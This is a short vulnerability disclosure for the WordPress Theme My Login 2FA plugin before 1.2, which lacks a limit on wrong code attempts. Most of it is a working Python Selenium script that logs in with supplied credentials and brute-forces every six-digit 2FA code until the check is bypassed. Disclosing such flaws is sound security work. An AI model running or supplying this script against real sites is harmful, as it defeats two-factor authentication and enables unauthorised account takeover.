Authored by Joost Grunwald | Site iecetee.com

WordPress Theme My Login 2FA plugin versions prior to 1.2 suffer from a brute forcing vulnerability.

The theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit:

from typing import KeysView
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait 
from selenium.webdriver.support import expected_conditions as EC 

driver = webdriver.Firefox()
driver.get("websiteloginhere")

# Locate the username field by its 'id' attribute and fill it in 
username_field = driver.find_element(By.ID, "user_login") 
username_field.click() 
username_field.send_keys("usernamehere") 
 
# Locate the password field by its 'id' attribute and fill it in 
password_field = driver.find_element(By.ID, "user_pass") 
password_field.click() 
password_field.send_keys("passwordhere") 

# Locate the Log In button and click it 
login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") 
login_button.click() 

# FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting 
 
for i in range(1000000): 
 code = str(i).zfill(6) 
 
 try: 
 wait = WebDriverWait(driver, 10) 
 code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']"))) 
 except: 
 break 
 
 code_field.click() 
 code_field.clear() 
 code_field.send_keys(code) 
 
 verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") 
 verify_button.click()

RELATED ARTICLESMORE FROM AUTHOR